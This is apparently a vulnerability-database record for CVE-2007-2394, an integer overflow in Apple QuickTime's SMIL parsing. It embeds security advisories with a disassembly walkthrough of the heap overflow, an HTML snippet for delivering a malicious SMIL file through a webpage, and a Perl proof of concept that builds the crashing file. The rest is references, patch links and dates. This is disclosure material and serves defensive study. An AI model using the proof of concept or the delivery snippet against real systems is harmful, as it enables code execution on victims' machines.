Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-2394 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. 
CREDIT\n\nThis vulnerability was reported to iDefense by David Vaartjes from ITsec\nSecurity Services http://www.itsec-ss.nl/. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n\niDefense confirmed the existence of this vulnerability in version\n7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime\nbinaries for Windows XP and Vista are identical, this issue will\naffect QuickTime running on Windows Vista also. \n\n----------------------------------------------------------------------\nFIXED VERSIONS\n----------------------------------------------------------------------\n\nApple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS\nX v10.4.9 or later, Windows Vista and Windows XP SP2 to address this\nissue. See [2] for additional information about this update. 
\n\nQuickTime 7.2 is not available for the Windows 2000 platform. \nPresumably, Apple dropped support for this platform. \n\n----------------------------------------------------------------------\nPRODUCT DESCRIPTION\n----------------------------------------------------------------------\n\nQuickTime is Apple\u0027s media player product. According to Apple,\nQuickTime is downloaded over 10 million times a month. According to\nSecunia, QuickTime is currently installed on over 50% of PCs [3]. \n\nThe Synchronized MultiMedia Integration Language (SMIL) provides a\nhigh-level scripting syntax for describing multimedia presentations. \nSMIL files are text files that use XML-based syntax to specify what\nmedia elements to present and where and when to present them. This can be exploited to overflow that heap\nbuffer with user supplied content, which eventually can result in the\nexecution of arbitrary code. \n\n--\n\u003csmil\u003e\n\u003chead\u003e\n \u003cmeta name=\"title\" content=\"specific-length\"/\u003e\n \u003cmeta name=\"author\" content=\"specific-length\"/\u003e\n\u003c/head\u003e\n\u003c/smil\u003e\n--\n\nWhen such a SMIL file is parsed the length value of the author field\nis stored in a short int data type (16 bit) without bounds checking. \nIn sub_66952B50(), this value is (sign) extended to a long int data\ntype (32 bit). \n\n--\n66952C9A push eax\n66952C9B call sub_668B57D0\n66952CA0 --\u003e movsx eax, word ptr [esp+2Ch+var_C]\n66952CA5 mov edx, [esp+2Ch+arg_4]\n66952CA9 lea ecx, [esp+2Ch+var_10]\n--\n\nSo, when the length of the author field is \u003e= 0x8000 bytes, it will be\nextended to a length value between 0xffff8000 and 0xffffffff. \n\nNext, in sub_668DCFD0() the sign extended length of the author field\nis added to the length of the title field + 0x20:\n\n--\n668DD04D jnz short loc_668DD0A0\n668DD04F test ebx, ebx\n668DD051 jz loc_668DD1EB\n668DD057 --\u003e lea eax, [edi+ebx] // edi holds the length of\n // the title field + 0x20. 
\n // ebx holds the sign\n // extended length of the\n // author field. \n668DD05A push eax\n668DD05B push ecx\n--\n\nIn sub_668DCA60(), 4 is added to the result of the calculation:\n\n--\n668DCB37 test edi, edi\n668DCB39 jz short loc_668DCB40\n668DCB3B --\u003e lea eax, [edi+4] // edi holds the result\n668DCB3E jmp short loc_668DCB42\n--\n\nNext, in sub_668F5550() the final length value is used as the dwBytes\nargument in a call to HeapRealloc():\n\n--\n668F555E push eax // dwBytes (user specified)\n668F555F push ecx // lpMem\n668F5560 push 1 // dwFlags\n668F5562 push edx // hHeap\n668F5563 --\u003e call ds:HeapReAlloc\n--\n\nThis allows for the allocation of a controlled amount of memory. For\nexample, when setting the length of the author field to 0xff00 (65280)\nand the length of the title field to 0xdf (223), the following\nsituation occurs:\n\n1: sub_66952B50():\n\n0x0000ff00 will be sign extended to 0xffffff00. \n\n2: sub_668DCFD0():\n\n0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00\nresulting in a length value of 0xffffffff. \n\n3: sub_668DCA60():\n\n0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003. \n\n4: sub_668F5550():\n\nHeapRealloc() will allocate 0x00000003 bytes of memory. \n\nNext, the pointer returned by HeapRealloc() is used by sub_668DCFD0()\nas the dest argument in a call to memcpy():\n\n--\n668DD08E push ebx // count, length value right\n // after sign extension\n // (0xffffff00). \n668DD08F push edx // src, buffer with user\n // supplied (author) content. \n668DD090 add eax, esi\n668DD092 --\u003e push eax // dest, 3 byte buffer. \n668DD093 call _memcpy\n668DD098 add esp, 18h\n668DD09B jmp loc_668DD1E5\n--\n\nThis copy action will result in an overflow of the 3 byte heap\nbuffer with data from the author field (user supplied). Due to the\nlarge amount of data written, this will finally result in an access\nviolation when memory is read or written outside the heap page. 
The\nexception is handled by the program and execution continues with a\ncorrupt heap. \n\nFor my platform (win2k), when a call to HeapAlloc() is executed the\nunlink code of ntdll will \"fail\" because we have overwritten pointers\nin the heap management structures of other heap buffers with our data. \nThe status of the registers during unlinking is:\n\n--\nEAX 78787878 \u003c-- user supplied\nECX 78787878 \u003c-- user supplied\nEDX 012DF6F0 ASCII \"xxxxxxxxxxx \u003c-\u003e xxxxxxxxxxxx\"\nEBX 00000078\nESP 0012EDC8\nEBP 0012EF84\nESI 01200000\nEDI 012DF6F0 ASCII \"xxxxxxxxxxx \u003c-\u003e xxxxxxxxxxxx\"\n--\n\n--\n77f867e6 mov dword ptr ds:[ecx],eax\n77f867e8 mov dword ptr ds:[eax+4],ecx\n--\n\nThe unlink instructions will result in the following exception:\n\n---------------------------\nQuickTimePlayerMain: QuickTimePlayer.exe\n\n\"The instruction at \"0x77f867e6\" referenced memory at \"0x78787878\". \nThe memory could not be \"written\"\n---------------------------\n\nThis shows that we are able to overwrite 4 bytes anywhere in the\naddress space of the process with \"any\" 4 byte value we want, which\ncan for example be exploited to overwrite function pointers like the\nSEH or UEF to gain control of the process. This 4 byte overwrite via\nthe unlink code does not apply to XPSP2 and W2K3 as \"safe unlinking\"\nis used on these platforms. \n\n----------------------------------------------------------------------\nATTACK VECTORS\n----------------------------------------------------------------------\n\nThis vulnerability can be triggered by luring a target user into\nrunning a malicious SMIL file locally or via a webpage. 
In the later\nscenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:\n\n\u003cOBJECT\n CLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\"\n CODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\"\n WIDTH=\"10\" HEIGHT=\"10\" \u003e\n \u003c!-- malicious SMIL file --\u003e\n \u003cPARAM NAME=\"src\" VALUE=\"poc.smil\" /\u003e\n \u003cEMBED\n \u003c!-- available .qtif or .mov file to start up QT for FF --\u003e\n SRC=\"available-sample.qtif\"\n \u003c!-- malicious SMIL file --\u003e\n QTSRC=\"poc.smil\"\n WIDTH=\"10\" HEIGHT=\"10\"\n PLUGINSPAGE=\"www.apple.com/quicktime/download\"\n TYPE=\"video/quicktime\"\n /\u003e\n\u003c/OBJECT\u003e\n\n----------------------------------------------------------------------\nPROOF OF CONCEPT\n----------------------------------------------------------------------\n\n#!/usr/bin/perl -w\n\n####\n# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC\n#\n# Researched on QuickTime 7.1.3 on Windows 2000 SP4. \n#\n# David Vaartjes \u003cd.vaartjes at gmail.com\u003e\n####\n\n$file = \"poc.smil\";\n$padd = \"x\";\n$cop_len = 36;\n\n####\n# By choosing the following lengths the\n# integer overflow will be triggered. \n####\n\n$tit_len = 223;\n$auth_len = 65280;\n\nopen(FH,\"\u003e$file\") or die \"Can\u0027t open file:$!\";\n\nprint FH\n \"\u003csmil\u003e\\n\". \n \"\u003chead\u003e\\n\". \n \" \u003cmeta name=\\\"title\\\" content=\\\"\".$padd x $tit_len.\"\\\"/\u003e\\n\". \n \" \u003cmeta name=\\\"author\\\" content=\\\"\".$padd x $auth_len.\"\\\"/\u003e\\n\". \n \" \u003cmeta name=\\\"copyright\\\" content=\\\"\".$padd x $cop_len.\"\\\"/\u003e\\n\". \n \"\u003c/head\u003e\\n\". 
\n \"\u003c/smil\u003e\";\n\nclose(FH);\n\n----------------------------------------------------------------------\nREFERENCES\n----------------------------------------------------------------------\n\n[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?\nid=556\n[2] http://docs.info.apple.com/article.html?artnum=305947\n[3] http://secunia.com/blog/7/\n\n----------------------------------------------------------------------\nDISCLOSURE TIMELINE\n----------------------------------------------------------------------\n\n04/02/2007 Initial vendor notification (by iDefense)\n04/09/2007 Initial vendor response\n07/11/2007 Apple security bulletin \u0026 patches available\n07/11/2007 Public disclosure of iDefense advisory\n09/03/2007 Public disclosure of this advisory\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2394"
},
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-25756",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-25756"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-2394",
"trust": 3.0
},
{
"db": "USCERT",
"id": "TA07-193A",
"trust": 2.9
},
{
"db": "BID",
"id": "24873",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "26034",
"trust": 2.7
},
{
"db": "SECTRACK",
"id": "1018373",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-2510",
"trust": 1.7
},
{
"db": "XF",
"id": "35357",
"trust": 1.4
},
{
"db": "CERT/CC",
"id": "VU#582681",
"trust": 1.2
},
{
"db": "OSVDB",
"id": "36134",
"trust": 1.1
},
{
"db": "USCERT",
"id": "SA07-193A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20070711 APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070717 RE: IDEFENSE SECURITY ADVISORY 07.11.07: APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2007-07-11",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "TA07-193A",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57674",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "59056",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "59040",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "30292",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "4359",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-83724",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-64870",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-25756",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57713",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"id": "VAR-200707-0547",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-25756"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T20:23:17.334000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "QuickTime 7.2 for Mac",
"trust": 0.8,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html"
},
{
"title": "QuickTime 7.2 for Windows",
"trust": 0.8,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html"
},
{
"title": "About the security content of QuickTime 7.2",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=305947-en"
},
{
"title": "About the security content of QuickTime 7.2",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=305947-ja"
},
{
"title": "\u30a2\u30c3\u30d7\u30eb - QuickTime",
"trust": 0.8,
"url": "http://www.apple.com/jp/quicktime/download/win.html"
},
{
"title": "QuickTime 7.2 for Mac",
"trust": 0.8,
"url": "http://www.apple.com/jp/ftp-info/reference/quicktime72formac.html"
},
{
"title": "QuickTime 7.2 for Windows",
"trust": 0.8,
"url": "http://www.apple.com/jp/ftp-info/reference/quicktime72forwindows.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-193a.html"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/24873"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/26034"
},
{
"trust": 2.3,
"url": "http://docs.info.apple.com/article.html?artnum=305947"
},
{
"trust": 2.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2007/jul/msg00001.html"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018373"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2007/2510"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/35357"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/473882/100/100/threaded"
},
{
"trust": 1.1,
"url": "http://osvdb.org/36134"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2007/2510"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35357"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2394"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta07-193a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta07-193a/index.html"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2394"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa07-193a.html"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/473882/100/100/threaded"
},
{
"trust": 0.4,
"url": "http://www.kb.cert.org/vuls/id/582681"
},
{
"trust": 0.3,
"url": "http://software.cisco.com/download/navigator.html?mdfid=283613663"
},
{
"trust": 0.3,
"url": "/archive/1/473882"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2394"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5090/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26034/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=304263\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-193a.html\u003e"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=305947\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/quicktime/download/standalone.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72formac.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/quicktime72forwindows.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://docs.info.apple.com/article.html?artnum=106704\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/byid?searchview\u0026query=quicktime_72\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://www.apple.com/quicktime/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.itsec-ss.nl/."
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://www.apple.com/quicktime/download\""
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/7/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?"
},
{
"trust": 0.1,
"url": "http://www.apple.com/qtactivex/qtplugin.cab\""
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "PACKETSTORM",
"id": "57697"
},
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "PACKETSTORM",
"id": "59056"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#582681"
},
{
"date": "2007-07-15T00:00:00",
"db": "VULHUB",
"id": "VHN-25756"
},
{
"date": "2007-07-11T00:00:00",
"db": "BID",
"id": "24873"
},
{
"date": "2007-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"date": "2007-07-13T00:55:11",
"db": "PACKETSTORM",
"id": "57697"
},
{
"date": "2007-07-13T01:43:24",
"db": "PACKETSTORM",
"id": "57713"
},
{
"date": "2007-07-12T02:20:40",
"db": "PACKETSTORM",
"id": "57674"
},
{
"date": "2007-09-05T04:22:40",
"db": "PACKETSTORM",
"id": "59056"
},
{
"date": "2007-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"date": "2007-07-15T21:30:00",
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-13T00:00:00",
"db": "CERT/CC",
"id": "VU#582681"
},
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-25756"
},
{
"date": "2007-09-05T18:21:00",
"db": "BID",
"id": "24873"
},
{
"date": "2007-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"date": "2007-07-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57713"
},
{
"db": "PACKETSTORM",
"id": "57674"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple QuickTime fails to properly handle malformed movie files",
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.